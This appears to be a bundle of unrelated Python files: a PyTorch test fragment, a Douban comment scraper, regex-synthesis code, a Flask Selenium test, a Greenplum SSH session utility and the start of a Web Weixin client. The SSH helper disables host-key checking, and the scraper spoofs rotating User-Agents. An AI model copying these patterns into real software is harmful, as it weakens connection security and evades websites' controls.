mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "to be one of"):
dist._get_debug_mode()
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
crawler.py
|
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup  # HTML parsing / data extraction
import re  # regular expressions for text matching
import urllib.request, urllib.error  # build URLs and fetch page data
import xlwt  # Excel output
import time
import random
import requests
import threading
from lxml import html
etree = html.etree
from queue import Queue
from threading import Thread
import pandas as pd
findcomment = re.compile(r'<span class="short">(.*)</span>')
findtime=re.compile(r'<span class="comment-time" title="(.*)"')
findstar_list=re.compile(r'<span class="(.*)" title="(.*)"></span>')
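# The captured class attribute encodes the star rating, e.g. 'allstar40 rating';
# run() later slices characters [7:9] ('40') and divides by 5 to get a score.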
findTitle = re.compile(r'<p class="pl2">> <a href="(.*)">去 (.*) 的页面</a></p>')
io = 'D:\\Top250.xls'
df = pd.read_excel(io)
def askURL(url):
pc_agent = [
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0);",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36"
"Mozilla/5.0 (X11; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
]
agent = random.choice(pc_agent)
head = {'User-Agent': agent}
# User-Agent header: tells the Douban server what kind of client (machine/browser) we are,
# i.e. what kind of content we can accept.
request = urllib.request.Request(url, headers=head)
html = ""
try:
response = urllib.request.urlopen(request)
html = response.read().decode("utf-8")
except urllib.error.URLError as e:
if hasattr(e, "code"):
print(e.code)
if hasattr(e, "reason"):
print(e.reason)
return html
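# Worker: repeatedly takes one movie id from the queue, scrapes up to 20 pages of
# short comments for it from Douban, and writes them to an .xls file named after
# the movie's rank in the Top250 spreadsheet.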
def run(q):  # q is a queue of Douban movie ids
while not q.empty():
datalist2 = []
qq=q.get()
j=0
for i in range(0, 20):
time.sleep(1)
url = "https://movie.douban.com/subject/" + str(qq) + "/comments?start=" + str(
i * 20) + "&limit=20&status=P&sort=new_score"
print(url)
html = askURL(url)
soup = BeautifulSoup(html, "html.parser")
# for item in soup.find_all('p', class_="pl2"): # find the matching elements
# j = j + 1
# #print(item)
# if j==1:
# #print(re.findall(r"\"keywords\">\n<meta content=\"(.+?)短评"))
# title = (re.findall(findTitle[1], str(item)))[0]
# print(title)
for item in soup.find_all('div', class_="comment"):  # find each comment block
data = []  # holds one comment's fields (text, time, rating)
comment = re.findall(findcomment, str(item))
comment_time = re.findall(findtime, str(item))
comment_star = re.findall(findstar_list, str(item))
if len(comment_star) == 0:
num1 = 0.0
else:
star = comment_star[0][0]
num = int(star[7:9])
num1 = num / 5
data.append(comment)
data.append(comment_time)
data.append(num1)
datalist2.append(data)
book = xlwt.Workbook(encoding="utf-8", style_compression=0)  # create a workbook object
sheet = book.add_sheet('豆瓣电影Top1comment', cell_overwrite_ok=True)  # create a worksheet
col = ("评论", "时间", "评分")
i = 0
sheet.write(0, 0, col[0])
sheet.write(0, 1, col[1])
sheet.write(0, 2, col[2])
for item in datalist2:
data = item
sheet.write(i + 1, 0, data[0])
sheet.write(i + 1, 1, data[1])
sheet.write(i + 1, 2, data[2])
i = i + 1
a = df[df['id'].isin([int(qq)])].index.values[0]
savepath2 = "豆瓣电影Top" +str(a+1) + "comment.xls"
print(savepath2)
book.save(savepath2)
q.task_done()
def main():
queue=Queue()
# io='D:\\Top250.xls'
# df = pd.read_excel(io)
df_li=df.values.tolist()
result=[]
for s_li in df_li:
result.append(s_li[8])
for i in result:
queue.put(str(i))
for i in range(10):
thread = Thread(target=run, args=(queue,))
thread.daemon = True  # exit together with the main thread
thread.start()
queue.join()  # block until the queue has been fully consumed and the threads finish
if __name__ == "__main__": # 当程序执行时
# 调用函数
main()
|
split.py
|
import torch
import os, sys
from multiprocessing import Process, Manager
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'submodels', 'SoftConciseNormalForm')))
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'submodels', 'RegexGenerator')))
from collections import Counter
from submodels.RegexGenerator.batch import *
import submodels.SCNF.synthesizer
from submodels.SCNF.parsetree import *
import submodels.SCNF.synthesizer_snort
from submodels.SCNF.util_snort import *
from seq2seq.dataset.dataset import Vocabulary
from submodels.SCNF.examples import Examples
from rpni import synthesis as rpni_synthesis
class Ex():
def __init__(self, pos, neg):
self.pos = pos
self.neg = neg
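# Heuristic check (as the surrounding code suggests): returns True when the last
# occurrence of `split_size` in the label list is not in the final position and is
# immediately followed by a 0 (a trailing sigma segment), so the caller can grow
# split_size by one.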
def is_last_sigma(lst, split_size):
try:
idx = len(lst) - 1 - list(reversed(lst)).index(split_size)
except:
return False
if idx != 9 and lst[idx+1] == 0:
return True
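# Splits each example string into `split_size` sub-strings according to the
# per-character segment labels predicted by the model; also returns, per example,
# which segments look like sigma (wildcard) segments. With no_split=True the
# strings are only decoded back through the vocabulary and returned unsplit.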
def split(strings, label, no_split=False):
vocab = Vocabulary()
splited_string = []
if no_split:
for batch_idx in range(len(strings)):
set = []
for set_idx in range(10):
seq = []
seq.append(''.join(map(lambda x: vocab.itos[x], strings[batch_idx, set_idx][
strings[batch_idx, set_idx] != strings.max()].tolist())))
set.append(seq)
splited_string.append(set)
return splited_string, None
label = [i.tolist() for i in label]
tmp = torch.LongTensor(label).transpose(0, 1).squeeze(-1).tolist()
split_size = torch.tensor(label)[torch.tensor(label) != vocab.stoi['<pad>']].max().item()
if any(map(lambda x:is_last_sigma(x, split_size),tmp)):
split_size += 1
label2 = []
sigma_lst = []
for templete in tmp:
tmp2 = []
sigma_lst2 = []
now = 0
for element in templete:
if element != 0:
if now != element and element != vocab.stoi['<pad>']:
for _ in range(element - len(sigma_lst2)):
sigma_lst2.append(False)
tmp2.append(element)
now = element
else:
if not sigma_lst2 or not sigma_lst2[-1]:
sigma_lst2.append(True)
tmp2.append(now + 1)
while len(sigma_lst2) < split_size:
sigma_lst2.append(False)
label2.append(tmp2)
sigma_lst.append(sigma_lst2)
predict_dict = [dict(Counter(l)) for l in label2]
for batch_idx in range(len(strings)):
set = []
for set_idx in range(10):
src_seq = strings[batch_idx, set_idx].tolist() # list of 30 alphabet
predict_seq_dict = predict_dict[batch_idx * 10 + set_idx] # predict label. ex. {0.0: 2, 1.0: 1, 11.0: 7}
seq = []
idx = 0
for seq_id in range(1, split_size + 1):
tmp = ''
if seq_id in predict_seq_dict.keys():
for _ in range(predict_seq_dict[float(seq_id)]):
tmp += vocab.itos[src_seq[idx]]
idx += 1
seq.append(tmp)
set.append(seq)
splited_string.append(set)
return splited_string, sigma_lst
def is_satisfy_pos(regex, examples, membership):
for string in examples.getPos():
if not membership(regex, string):
return False
return True
def get_sigma(examples):
if is_satisfy_pos('\d*', examples, membership):
return r"\d*"
elif is_satisfy_pos('\w*', examples, membership):
return r"\w*"
else:
return r".*"
def generate_split_regex(splited_pos, splited_neg, split_model=False, count_limit=1000, alphabet_size=5,
data_type='random', sigma_lst=None, submodel='alpharegex'):
regex = []
split_size = len(splited_pos[0])
print("Split Size: ", split_size)
splited_pos = list(filter(lambda x: any(x), splited_pos))
splited_neg = list(filter(lambda x: any(x), splited_neg))
for sub_id in range(split_size):
pos = []
neg = []
for set_idx in range(len(splited_pos)):
pos.append(splited_pos[set_idx][sub_id])
for set_idx in range(len(splited_neg)):
neg.append(splited_neg[set_idx][0])
if not neg:
neg.append('')
sub_pos_set = set(pos)
sub_neg_set = set(neg)
if sub_id + 1 == split_size:
#if sub_id != 0:
prefix = ''.join(regex)
else:
sub_neg_set -= sub_pos_set
prefix = None
print('Splited Positive Strings:', sub_pos_set)
print('Splited Negative Strings:', sub_neg_set)
if len(sub_pos_set) == 1:
regex.append('(' + sub_pos_set.pop() + ')')
continue
if submodel == 'blue_fringe':
count_limit = 1000000000
tmp = rpni_synthesis(Examples(pos=sub_pos_set, neg=sub_neg_set), count_limit, start_with_no_concat=split_model, prefix_for_neg_test=prefix, suffix_for_neg_test=None, alphabet_size=alphabet_size)
tmp = str(tmp)
elif submodel == 'alpharegex':
if data_type == 'random':
if sigma_lst is not None and sub_id + 1 != split_size and any(list(map(lambda x: x[sub_id], sigma_lst))):
tmp = repr(KleenStar(Or(*[Character(str(x)) for x in range(alphabet_size)])))
else:
tmp = repr(submodels.SoftConciseNormalForm.synthesizer.synthesis(Examples(pos=sub_pos_set, neg=sub_neg_set),
count_limit,
start_with_no_concat=split_model,
prefix_for_neg_test=prefix,
suffix_for_neg_test=None,
alphabet_size=alphabet_size))
else:
if sigma_lst is not None and sub_id + 1 != split_size and any(list(map(lambda x: x[sub_id], sigma_lst))):
tmp = get_sigma(Examples(pos=sub_pos_set, neg=sub_neg_set))
else:
tmp, _ = submodels.SoftConciseNormalForm.synthesizer_snort.synthesis(
Examples(pos=sub_pos_set, neg=sub_neg_set), count_limit, start_with_no_concat=split_model,
prefix_for_neg_test=prefix, suffix_for_neg_test=None, alphabet_size=alphabet_size)
tmp = repr(tmp)
elif submodel == 'set2regex':
pass
elif submodel == 'regex_generator':
if sigma_lst is not None and sub_id + 1 != split_size and any(list(map(lambda x: x[sub_id], sigma_lst))):
tmp = get_sigma(Examples(pos=sub_pos_set, neg=sub_neg_set))
else:
tmp = execute([Ex(list(sub_pos_set), list(sub_neg_set))]).replace('++', '+')
if tmp == 'None':
return None, 0
regex.append('(' + tmp + ')')
return ''.join(regex).replace('()',''), split_size
def generate_regex_with_split(sigma_lst, sub_id, sub_pos_set, sub_neg_set, split_model, count_limit, alphabet_size, data_type, return_dict):
if len(sub_pos_set) == 1:
return_dict[sub_id] = sub_pos_set.pop()
return
if data_type == 'random':
if sigma_lst is not None and any(list(map(lambda x: x[sub_id], sigma_lst))):
tmp = repr(KleenStar(Or(*[Character(str(x)) for x in range(alphabet_size)])))
else:
tmp = repr(submodels.SoftConciseNormalForm.synthesizer.synthesis(Examples(pos=sub_pos_set, neg=sub_neg_set),
count_limit,
start_with_no_concat=split_model,
prefix_for_neg_test=None,
suffix_for_neg_test=None,
alphabet_size=alphabet_size))
else:
if sigma_lst is not None and any(list(map(lambda x: x[sub_id], sigma_lst))):
tmp = get_sigma(Examples(pos=sub_pos_set, neg=sub_neg_set))
else:
tmp, _ = submodels.SoftConciseNormalForm.synthesizer_snort.synthesis(
Examples(pos=sub_pos_set, neg=sub_neg_set), count_limit, start_with_no_concat=split_model,
prefix_for_neg_test=None, suffix_for_neg_test=None, alphabet_size=alphabet_size)
tmp = repr(tmp)
return_dict[sub_id] = tmp
def generate_regex_with_split_bf(sub_id, sub_pos_set, sub_neg_set, split_model, count_limit, alphabet_size, return_dict):
if len(sub_pos_set) == 1:
return_dict[sub_id] = sub_pos_set.pop()
return
tmp = rpni_synthesis(Examples(pos=sub_pos_set, neg=sub_neg_set), count_limit, start_with_no_concat=split_model, prefix_for_neg_test=None, suffix_for_neg_test=None, alphabet_size=alphabet_size)
return_dict[sub_id] = str(tmp)
def generate_regex_with_split_rg(sub_id, sub_pos_set, sub_neg_set, return_dict):
if len(sub_pos_set) == 1:
return_dict[sub_id] = sub_pos_set.pop()
return
tmp = execute([Ex(list(sub_pos_set), list(sub_neg_set))])
#print(tmp)
tmp = str(tmp).replace('++', '+').replace('?+', '+')
return_dict[sub_id] = tmp
def generate_split_regex_in_parallel(splited_pos, splited_neg, split_model=False, count_limit=1000, alphabet_size=5,
data_type='random', sigma_lst=None, submodel='alpharegex', return_dict=None):
regex = []
split_size = len(splited_pos[0])
print("Split Size: ", split_size)
splited_pos = list(filter(lambda x: any(x), splited_pos))
splited_neg = list(filter(lambda x: any(x), splited_neg))
pos_split_set = []
for sub_id in range(split_size):
pos = []
neg = []
for set_idx in range(len(splited_pos)):
pos.append(splited_pos[set_idx][sub_id])
for set_idx in range(len(splited_neg)):
neg.append(splited_neg[set_idx][0])
if not neg:
neg.append('')
if submodel == 'blue_fringe':
pos = list(map(lambda x:x.replace('!','z'),pos))
neg = list(map(lambda x: x.replace('!', 'z'), neg))
sub_pos_set = set(pos)
sub_neg_set = set(neg)
pos_split_set.append([sub_pos_set, sub_neg_set])
procs = []
if submodel == 'regex_generator':
for sub_id in range(split_size):
proc = Process(target=generate_regex_with_split_rg, args=(sub_id, pos_split_set[sub_id][0], pos_split_set[sub_id][1], return_dict))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
return '(' + ')('.join([return_dict[i] for i in range(split_size)]) + ')'
for sub_id in range(split_size - 1):
if submodel == 'blue_fringe':
count_limit = 1000000000
proc = Process(target=generate_regex_with_split_bf, args=(sub_id, pos_split_set[sub_id][0], pos_split_set[sub_id][1], split_model, count_limit, alphabet_size, return_dict))
elif submodel == 'alpharegex':
proc = Process(target=generate_regex_with_split, args=(sigma_lst, sub_id, pos_split_set[sub_id][0], pos_split_set[sub_id][1], split_model, count_limit, alphabet_size, data_type, return_dict))
elif submodel == 'set2regex':
pass
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
if split_size > 1:
prefix = '(' + ')('.join([return_dict[i] for i in range(split_size - 1)]) + ')'
else:
prefix = ''
if submodel == 'blue_fringe':
count_limit = 1000000000
tmp = rpni_synthesis(Examples(pos=pos_split_set[-1][0], neg=pos_split_set[-1][1]), count_limit, start_with_no_concat=split_model, prefix_for_neg_test=prefix, suffix_for_neg_test=None, alphabet_size=alphabet_size)
tmp = str(tmp)
elif submodel == 'alpharegex':
if data_type == 'random':
tmp = repr(submodels.SoftConciseNormalForm.synthesizer.synthesis(Examples(pos=pos_split_set[-1][0], neg=pos_split_set[-1][1]), count_limit, start_with_no_concat=split_model,
prefix_for_neg_test=prefix, suffix_for_neg_test=None, alphabet_size=alphabet_size))
else:
tmp, _ = submodels.SoftConciseNormalForm.synthesizer_snort.synthesis(
Examples(pos=pos_split_set[-1][0], neg=pos_split_set[-1][1]), count_limit, start_with_no_concat=split_model,
prefix_for_neg_test=prefix, suffix_for_neg_test=None, alphabet_size=alphabet_size)
tmp = repr(tmp)
elif submodel == 'set2regex':
pass
if tmp == 'None':
return None, 0
final = prefix + '(' + tmp + ')'
return final.replace('()','') , split_size
|
test_selenium.py
|
#-*- coding: utf-8 -*-
import re
import threading
import time
import unittest
from selenium import webdriver
from app import create_app, db
from app.models import Role, User, Post
class SeleniumTestCase(unittest.TestCase):
client = None
@classmethod
def setUpClass(cls):
# start Chrome
try:
cls.client = webdriver.Chrome()
except:
pass
# skip these tests if the browser could not be started
if cls.client:
# create the application
cls.app = create_app('testing')
cls.app_context = cls.app.app_context()
cls.app_context.push()
# suppress logging to keep unittest output clean
import logging
logger = logging.getLogger('werkzeug')
logger.setLevel("ERROR")
# create the database and populate with some fake data
db.create_all()
Role.insert_roles()
User.generate_fake(10)
Post.generate_fake(10)
# add an administrator user
admin_role = Role.query.filter_by(permissions=0xff).first()
admin = User(email='john@example.com',
username='john', password='cat',
role=admin_role, confirmed=True)
db.session.add(admin)
db.session.commit()
# start the Flask server in a thread
threading.Thread(target=cls.app.run).start()
# give the server a second to ensure it is up
time.sleep(1)
@classmethod
def tearDownClass(cls):
if cls.client:
# stop the flask server and the browser
cls.client.get('http://localhost:5000/shutdown')
cls.client.close()
# destroy database
db.drop_all()
db.session.remove()
# remove application context
cls.app_context.pop()
def setUp(self):
if not self.client:
self.skipTest('Web browser not available')
def tearDown(self):
pass
def test_admin_home_page(self):
# navigate to home page
self.client.get('http://localhost:5000/')
self.assertTrue(re.search(r'Hello,\s+Stranger!',
self.client.page_source))
# navigate to login page
self.client.find_element_by_link_text('Log In').click()
self.assertTrue('<h1>Login</h1>' in self.client.page_source)
# login
self.client.find_element_by_name('email'). \
send_keys('john@example.com')
self.client.find_element_by_name('password').send_keys('cat')
self.client.find_element_by_name('submit').click()
self.assertTrue(re.search(r'Hello,\s+john!', self.client.page_source))
# navigate to the user's profile page
self.client.find_element_by_link_text('Profile').click()
self.assertTrue('<h1>john</h1>' in self.client.page_source)
|
ssh_utils.py
|
#!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# This file contains ssh Session class and support functions/classes.
import sys
import os
import cmd
import threading
from gppylib.commands.base import WorkerPool, REMOTE, ExecutionError
from gppylib.commands.unix import Hostname, Echo
sys.path.append(sys.path[0] + '/lib')
import pxssh
import pexpect
import socket
class HostNameError(Exception):
def __init__(self, msg, lineno = 0):
if lineno: self.msg = ('%s at line %d' % (msg, lineno))
else: self.msg = msg
def __str__(self):
return self.msg
class SSHError(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
# Utility Functions
def ssh_prefix(host):
ssh = 'ssh -o "BatchMode yes" -o "StrictHostKeyChecking no" ' + host
return ssh
def get_hosts(hostsfile):
hostlist = HostList()
hostlist.parseFile(hostsfile)
return hostlist.get()
class HostList():
def __init__(self):
self.list = []
def get(self):
return self.list
def addHostNameAlternatives(self):
''' Add short name and FQDN for each host to the host list '''
for host in self.list:
try:
fqdn = socket.getfqdn(host)
# Add the fully qualified domain name as well
if fqdn not in self.list:
self.list.append(fqdn)
except socket.error, e:
print "Error while including hostname alternatives"
def add(self, host, lineno=0):
'''Add a host to the hostlist.'''
# we don't allow the user@ syntax here
if host.find('@') >= 0:
raise HostNameError(host, lineno)
# MPP-13617 - check for ipv6
if host.find(':') >= 0:
try:
socket.inet_pton(socket.AF_INET6, host)
except socket.error, e:
raise HostNameError(str(e), lineno)
# MPP-13617 - check for ipv4
if host.find('.') >= 0:
octs = host.split('.')
if len(octs) == 4 and False not in [o.isdigit() for o in octs]:
try:
socket.inet_pton(socket.AF_INET, host)
except socket.error, e:
raise HostNameError(str(e), lineno)
self.list.append(host)
return self.list
def parseFile(self, path):
'''Add lines in a file to the hostlist.'''
with open(path) as fp:
for i, line in enumerate(fp):
line = line.strip()
if not line or line[0] == '#':
continue
self.add(line, i+1)
return self.list
def checkSSH(self):
'''Check that ssh to hostlist is okay.'''
pool = WorkerPool(min(len(self.list), 16))
for h in self.list:
cmd = Echo('ssh test', '', ctxt=REMOTE, remoteHost=h)
pool.addCommand(cmd)
pool.join()
pool.haltWork()
for cmd in pool.getCompletedItems():
if not cmd.get_results().wasSuccessful():
raise SSHError("Unable to ssh to '%s'" % cmd.remoteHost)
return True
def filterMultiHomedHosts(self):
'''For multiple hostnames that refer to the same node, keep only one in the hostlist.'''
unique = {}
pool = WorkerPool(min(len(self.list), 16))
for h in self.list:
cmd = Hostname('hostname', ctxt=REMOTE, remoteHost=h)
pool.addCommand(cmd)
pool.join()
pool.haltWork()
for finished_cmd in pool.getCompletedItems():
hostname = finished_cmd.get_hostname()
if (not hostname):
unique[finished_cmd.remoteHost] = finished_cmd.remoteHost
elif not unique.get(hostname):
unique[hostname] = finished_cmd.remoteHost
elif hostname == finished_cmd.remoteHost:
unique[hostname] = finished_cmd.remoteHost
self.list = unique.values()
return self.list
def removeBadHosts(self):
''' Update the host list to include only the hosts on which SSH was successful'''
pool = WorkerPool(min(len(self.list), 16))
for h in self.list:
cmd = Echo('ssh test', '', ctxt=REMOTE, remoteHost=h)
pool.addCommand(cmd)
pool.join()
pool.haltWork()
bad_hosts = []
working_hosts = []
for cmd in pool.getCompletedItems():
if not cmd.get_results().wasSuccessful():
bad_hosts.append(cmd.remoteHost)
else:
working_hosts.append(cmd.remoteHost)
self.list = working_hosts[:]
return bad_hosts
# Session is a command session, derived from a base class cmd.Cmd
class Session(cmd.Cmd):
'''Implements a list of open ssh sessions ready to execute commands'''
verbose=False
hostList=[]
userName=None
echoCommand=False
class SessionError(StandardError): pass
class SessionCmdExit(StandardError): pass
def __init__(self, hostList=None, userName=None):
cmd.Cmd.__init__(self)
self.pxssh = []
self.prompt = '=> '
self.peerStringFormatRaw = None
if hostList:
for host in hostList:
self.hostList.append(host)
if userName: self.userName=userName
def peerStringFormat(self):
if self.peerStringFormatRaw: return self.peerStringFormatRaw
cnt = 0
for p in self.pxssh:
if cnt < len(p.x_peer): cnt = len(p.x_peer)
self.peerStringFormatRaw = "[%%%ds]" % cnt
return self.peerStringFormatRaw
def login(self, hostList=None, userName=None):
'''This is the normal entry point used to add host names to the object and log in to each of them'''
if self.verbose: print '\n[Reset ...]'
if not (self.hostList or hostList):
raise self.SessionError('No host list available to Login method')
if not (self.userName or userName):
raise self.SessionError('No user name available to Login method')
#Cleanup
self.clean()
if hostList: #We have a new hostlist to use, initialize it
self.hostList=[]
for host in hostList:
self.hostList.append(host)
if userName: self.userName=userName #We have a new userName to use
# MPP-6583. Save off term type and set to nothing before creating ssh process
origTERM = os.getenv('TERM', None)
os.putenv('TERM', '')
for host in self.hostList:  # open an ssh session for every host in the list
p = pxssh.pxssh()
p.loginAsync(host, self.userName)
p.x_peer = host
p.x_pid = p.pid
self.pxssh.append(p)
# Restore terminal type
if origTERM:
os.putenv('TERM', origTERM)
some_errors = False
good_list = []
for p in self.pxssh:
success_login = False
if self.verbose: print '[INFO] login %s' % p.x_peer
try:
success_login = p.loginWait(set_term_dumb=True)
except Exception as e:
pass
if success_login:
good_list.append(p)
else:
some_errors = True
print '[ERROR] unable to login to %s' % p.x_peer
if some_errors:
print 'hint: use gpssh-exkeys to setup public-key authentication between hosts'
self.pxssh = good_list
def close(self):
return self.clean()
def reset(self):
'''reads from all the ssh connections to make sure we don't have any pending cruft'''
for s in self.pxssh:
s.readlines()
def clean(self):
net_return_code = self.closePxsshList(self.pxssh)
self.pxssh = []
return net_return_code
def emptyline(self):
pass
def escapeLine(self,line):
'''Escape occurrences of \, " and $ as needed and package the line as an "eval" shell command'''
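# For example, the input line  echo $HOME  becomes:  eval "echo \$HOME" < /dev/null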
line = line.strip()
if line == 'EOF' or line == 'exit' or line == 'quit':
raise self.SessionCmdExit()
line = line.split('\\')
line = '\\\\'.join(line)
line = line.split('"')
line = '\\"'.join(line)
line = line.split('$')
line = '\\$'.join(line)
line = 'eval "' + line + '" < /dev/null'
return line
def executeCommand(self,command):
commandoutput=[]
if self.echoCommand:
escapedCommand = command.replace('"', '\\"')
command = 'echo "%s"; %s' % (escapedCommand, command)
#Execute the command in all of the ssh sessions
for s in self.pxssh:
s.sendline(command)
s.flush()
#Wait for each command and retrieve the output
for s in self.pxssh:
#Wait for each command to finish
#!! TODO verify that this is a tight wait loop and find another way to do this
while not s.prompt(120) and s.isalive() and not s.eof(): pass
for s in self.pxssh:
#Split the output into an array of lines so that we can add text to the beginning of
# each line
output = s.before.split('\n')
output = output[1:-1]
commandoutput.append(output)
return commandoutput.__iter__()
# Interactive command line handler
# Override of base class, handles commands that aren't recognized as part of a predefined set
# The "command" argument is a command line to be executed on all available command sessions
# The output of the command execution is printed to the standard output, prepended with
# the hostname of each machine from which the output came
def default(self, command):
line = self.escapeLine(command)
if self.verbose: print command
#Execute the command on our ssh sessions
commandoutput=self.executeCommand(command)
self.writeCommandOutput(commandoutput)
def writeCommandOutput(self,commandoutput):
'''Takes a list of output lists as an iterator and writes them to standard output,
formatted with the hostname from which each output array was obtained'''
for s in self.pxssh:
output = commandoutput.next()
#Write the output
if len(output) == 0:
print (self.peerStringFormat() % s.x_peer)
else:
for line in output:
print (self.peerStringFormat() % s.x_peer), line
def closePxsshList(self,list):
lock = threading.Lock()
return_codes = [0]
def closePxsshOne(p, return_codes):
p.logout()
p.close()
with lock:
return_codes.append(p.exitstatus)
th = []
for p in list:
t = threading.Thread(target=closePxsshOne, args=(p, return_codes))
t.start()
th.append(t)
for t in th:
t.join()
return max(return_codes)
|
weixin.py
|
#!/usr/bin/env python
# coding: utf-8
import qrcode
from pyqrcode import QRCode
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
import http.cookiejar
import requests
import xml.dom.minidom
import json
import time
import ssl
import re
import sys
import os
import subprocess
import random
import multiprocessing
import platform
import logging
import http.client
from collections import defaultdict
from urllib.parse import urlparse
from lxml import html
from socket import timeout as timeout_error
from autoreply import autoReply
#import pdb
# for media upload
import mimetypes
from requests_toolbelt.multipart.encoder import MultipartEncoder
def catchKeyboardInterrupt(fn):
def wrapper(*args):
try:
return fn(*args)
except KeyboardInterrupt:
print('\n[*] 强制退出程序')
logging.debug('[*] 强制退出程序')
return wrapper
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, str):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.items():
if isinstance(key, str):
key = key.encode('utf-8')
if isinstance(value, str):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
class WebWeixin(object):
def __str__(self):
description = \
"=========================\n" + \
"[#] Web Weixin\n" + \
"[#] Debug Mode: " + str(self.DEBUG) + "\n" + \
"[#] Uuid: " + self.uuid + "\n" + \
"[#] Uin: " + str(self.uin) + "\n" + \
"[#] Sid: " + self.sid + "\n" + \
"[#] Skey: " + self.skey + "\n" + \
"[#] DeviceId: " + self.deviceId + "\n" + \
"[#] PassTicket: " + self.pass_ticket + "\n" + \
"========================="
return description
def __init__(self):
self.DEBUG = False
self.commandLineQRCode = False
self.uuid = ''
self.base_uri = ''
self.redirect_uri = ''
self.uin = ''
self.sid = ''
self.skey = ''
self.pass_ticket = ''
self.deviceId = 'e' + repr(random.random())[2:17]
self.BaseRequest = {}
self.synckey = ''
self.SyncKey = []
self.User = []
self.MemberList = []
self.ContactList = []  # friends
self.GroupList = []  # group chats
self.GroupMemeberList = []  # group members
self.PublicUsersList = []  # official/service accounts
self.SpecialUsersList = []  # special accounts
self.autoReplyMode = True
self.syncHost = ''
self.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'
self.interactive = False
self.autoOpen = False
self.saveFolder = os.path.join(os.getcwd(), 'saved')
self.saveSubFolders = {'webwxgeticon': 'icons', 'webwxgetheadimg': 'headimgs', 'webwxgetmsgimg': 'msgimgs',
'webwxgetvideo': 'videos', 'webwxgetvoice': 'voices', '_showQRCodeImg': 'qrcodes'}
self.appid = 'wx782c26e4c19acffb'
self.lang = 'zh_CN'
self.lastCheckTs = time.time()
        self.MemberCount = 0
self.SpecialUsers = ['newsapp', 'fmessage', 'filehelper', 'weibo', 'qqmail', 'fmessage', 'tmessage', 'qmessage', 'qqsync', 'floatbottle', 'lbsapp', 'shakeapp', 'medianote', 'qqfriend', 'readerapp', 'blogapp', 'facebookapp', 'masssendapp', 'meishiapp', 'feedsapp',
'voip', 'blogappweixin', 'weixin', 'brandsessionholder', 'weixinreminder', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'officialaccounts', 'notification_messages', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'wxitil', 'userexperience_alarm', 'notification_messages']
        self.TimeOut = 20  # minimum sync interval (seconds)
self.media_count = -1
self.cookie = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cookie))
opener.addheaders = [('User-agent', self.user_agent)]
urllib.request.install_opener(opener)
